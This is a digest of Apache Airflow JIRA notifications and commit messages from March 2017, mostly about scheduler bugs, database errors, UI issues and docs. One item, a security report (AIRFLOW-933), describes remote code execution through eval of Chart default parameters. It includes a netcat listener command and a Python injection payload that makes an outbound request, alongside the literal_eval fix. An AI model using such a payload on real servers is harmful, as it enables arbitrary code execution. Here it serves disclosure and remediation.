https://issues.apache.org/jira/browse/AIRFLOW-972?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924825#comment-15924825
 ] 

Bolke de Bruin commented on AIRFLOW-972:


Please test with airflow 1.8.0 (rc5)

> Airflow kills subprocesses created by task instances
> 
>
> Key: AIRFLOW-972
> URL: https://issues.apache.org/jira/browse/AIRFLOW-972
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: Airflow 1.7.1
>Reporter: Richard Moorhead
>Priority: Minor
>
> We have a task which creates multiple subprocesses via 
> [joblib|https://pythonhosted.org/joblib/parallel.html]; we're noticing that 
> airflow seems to kill the subprocesses prior to their completion. Is there 
> any way around this behavior?



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-976) Mark success running task causes it to fail

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-976?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-976:
---
Affects Version/s: 1.8.0

> Mark success running task causes it to fail
> ---
>
> Key: AIRFLOW-976
> URL: https://issues.apache.org/jira/browse/AIRFLOW-976
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: 1.8.0
>Reporter: Dan Davydov
>Assignee: Alex Guziel
> Fix For: 1.8.1
>
>
> Marking success on a running task in the UI causes it to fail.
> Expected Behavior:
> Task instance is killed and marked as successful
> Actual Behavior:
> Task instance is killed and marked as failed
> [~saguziel] [~bolke]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-976) Mark success running task causes it to fail

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-976?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-976:
---
Fix Version/s: 1.8.1

> Mark success running task causes it to fail
> ---
>
> Key: AIRFLOW-976
> URL: https://issues.apache.org/jira/browse/AIRFLOW-976
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: 1.8.0
>Reporter: Dan Davydov
>Assignee: Alex Guziel
> Fix For: 1.8.1
>
>
> Marking success on a running task in the UI causes it to fail.
> Expected Behavior:
> Task instance is killed and marked as successful
> Actual Behavior:
> Task instance is killed and marked as failed
> [~saguziel] [~bolke]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-977) Deadlocked DAG run with MySQL v5.7.17

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-977?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924822#comment-15924822
 ] 

Bolke de Bruin commented on AIRFLOW-977:


Please test with Airflow 1.8.0 (rc5), many fixes in this area.

> Deadlocked DAG run with MySQL v5.7.17
> -
>
> Key: AIRFLOW-977
> URL: https://issues.apache.org/jira/browse/AIRFLOW-977
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.7.1
> Environment: macOS Sierra 10.12.3, MySQL 5.7.17, Airflow 1.7.1.3
>Reporter: Michael Kotliar
>  Labels: easyfix
>
> When using MySQL 5.7.17 all DATETIME values are saved in DB using rounding, 
> not truncating, like it was before in MySQL 5.5. This causes failing in 
> is_queueable check for task, when its execution date was previously saved in 
> DB rounded towards bigger value. It makes execution date to be bigger than 
> datetime.now(). If all of the tasks from DAG have failed this check, the DAG 
> becomes deadlocked.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-967) ldap3 has incompatibilities with py2

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-967?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-967.

   Resolution: Fixed
Fix Version/s: 1.8.0

> ldap3 has incompatibilities with py2
> 
>
> Key: AIRFLOW-967
> URL: https://issues.apache.org/jira/browse/AIRFLOW-967
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.0
>
>
> py2 gets newstr that doesn't work with ldap3



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-974) airflow.util.file mkdir has a race condition

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-974?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-974.

   Resolution: Fixed
 Assignee: Bolke de Bruin
Fix Version/s: 1.8.1

> airflow.util.file mkdir has a race condition
> 
>
> Key: AIRFLOW-974
> URL: https://issues.apache.org/jira/browse/AIRFLOW-974
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.1
>
>
> mkdir has a race condition:
> It checks for the existence of a directory and afterwards it tries to create 
> it. If a process steps in between and creates that directory between the 
> check and the creation of the directory, the function errors.
> [~aoen]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924815#comment-15924815
 ] 

Bolke de Bruin commented on AIRFLOW-980:


Please test with Airflow 1.8.0 (rc5)

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution),
> started seeing below error stack again and again .. In scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': 

[jira] [Closed] (AIRFLOW-968) TravisCI builds in master are failing for Python 2.7

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-968?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-968.
--
Resolution: Fixed

> TravisCI builds in master are failing for Python 2.7
> 
>
> Key: AIRFLOW-968
> URL: https://issues.apache.org/jira/browse/AIRFLOW-968
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: travis
>Reporter: Adam Bloomston
>Priority: Blocker
>
> Last good build on master: 
> https://travis-ci.org/apache/incubator-airflow/builds/204780659
> First failing build on master: 
> https://travis-ci.org/apache/incubator-airflow/builds/205138766
> Python 3.4 builds seem fine, Python 2.7 builds are failing.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution

2017-03-14 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924765#comment-15924765
 ] 

ASF subversion and git services commented on AIRFLOW-933:
-

Commit 2bf52ab16960f00cb9a98ba455d5851aabf6305f in incubator-airflow's branch 
refs/heads/master from [~artwr]
[ https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;h=2bf52ab ]

[AIRFLOW-933] Replace eval with literal_eval to prevent RCE

Replace eval with a literal eval to help prevent arbitrary code
execution on the webserver host.


> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---
>
> Key: AIRFLOW-933
> URL: https://issues.apache.org/jira/browse/AIRFLOW-933
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Rui Wang
>Assignee: Rui Wang
>
> mpact: Any user with the ability to create or edit Charts may execute 
> arbitrary code on the Airflow server.
> Location: The Default Parameters form eld sent when saving a Chart located at 
> /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default 
> Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which 
> will execute code:
> {code}
> def label_link(v, c, m, p): 
>   try:
> default_params = eval(m.default_params) 
>   except:
> default_params = {} 
>   url = url_for(
> 'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
> **default_params)
>   return Markup("{m.label}".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener 
> with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
> 4. In its Default Parameters field, and enter-in the following example 
> payload:
>   (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), 
> None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, 
> __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network 
> request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval 
> (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely 
> parses its input, rather than executing it as code.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[2/2] incubator-airflow git commit: Merge pull request #2150 from artwr/artwr-fix_another_use_of_eval

2017-03-14 Thread arthur
Merge pull request #2150 from artwr/artwr-fix_another_use_of_eval


Project: http://git-wip-us.apache.org/repos/asf/incubator-airflow/repo
Commit: http://git-wip-us.apache.org/repos/asf/incubator-airflow/commit/c44e2009
Tree: http://git-wip-us.apache.org/repos/asf/incubator-airflow/tree/c44e2009
Diff: http://git-wip-us.apache.org/repos/asf/incubator-airflow/diff/c44e2009

Branch: refs/heads/master
Commit: c44e2009ee625ce4a82c50e585a3c8617d9b4ff8
Parents: ed03bb7 2bf52ab
Author: Arthur Wiedmer 
Authored: Tue Mar 14 11:39:45 2017 -0700
Committer: Arthur Wiedmer 
Committed: Tue Mar 14 11:39:45 2017 -0700

--
 airflow/www/views.py | 8 
 1 file changed, 4 insertions(+), 4 deletions(-)
--




[jira] [Created] (AIRFLOW-981) TreeView date axis shows dates into the future

2017-03-14 Thread Ruslan Dautkhanov (JIRA)
Ruslan Dautkhanov created AIRFLOW-981:
-

 Summary: TreeView date axis shows dates into the future
 Key: AIRFLOW-981
 URL: https://issues.apache.org/jira/browse/AIRFLOW-981
 Project: Apache Airflow
  Issue Type: Bug
  Components: ui, webserver
Affects Versions: Airflow 1.7.1.3
Reporter: Ruslan Dautkhanov
Priority: Critical
 Attachments: Airflow - TreeView-2 weeks in the future.png

Freshly installed AirFlow

example_twitter_dag Tree View shows date scale from Mar 13 (yesterday when that 
job didn't even run) till March 27th and further (2+ weeks into the future)

So the tasks below that date scale are totally misaligned to the time dimension.
See screenshot below.

!Airflow - TreeView-2 weeks in the future.png!



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-797) CLONE - No such transport: sqla when using CeleryExecutor

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924487#comment-15924487
 ] 

Ruslan Dautkhanov commented on AIRFLOW-797:
---

Any workaround for this until that celery/kombu pr is not merged?

> CLONE - No such transport: sqla when using CeleryExecutor
> -
>
> Key: AIRFLOW-797
> URL: https://issues.apache.org/jira/browse/AIRFLOW-797
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
>Reporter: Amin Ghadersohi
>Assignee: Amin Ghadersohi
>Priority: Trivial
>
> Cloned https://issues.apache.org/jira/browse/AIRFLOW-749 as it is not fixed. 
> I installed airflow using the regular pip install. I followed by changing my 
> db to postgres for execution using Celery. 
> After changing the executor and installing celery (4.0.2) running the example 
> dags gives me the following error:
> ```
> raise KeyError('No such transport: {0}'.format(transport))
> KeyError: u'No such transport: sqla'
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15923829#comment-15923829
 ] 

Chris Sng commented on AIRFLOW-979:
---

Please review my Pull Request #2149:
https://github.com/apache/incubator-airflow/pull/2149

> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chris Sng updated AIRFLOW-979:
--
Issue Type: Wish  (was: Bug)

> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chris Sng updated AIRFLOW-979:
--
Description: 
Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng) & 
[@datagovsg](https://github.com/datagovsg)]
```

  was:
Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng)]
```


> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)
Chris Sng created AIRFLOW-979:
-

 Summary: Add GovTech GDS
 Key: AIRFLOW-979
 URL: https://issues.apache.org/jira/browse/AIRFLOW-979
 Project: Apache Airflow
  Issue Type: Bug
  Components: docs
Reporter: Chris Sng
Assignee: Chris Sng
Priority: Trivial


Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng)]
```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)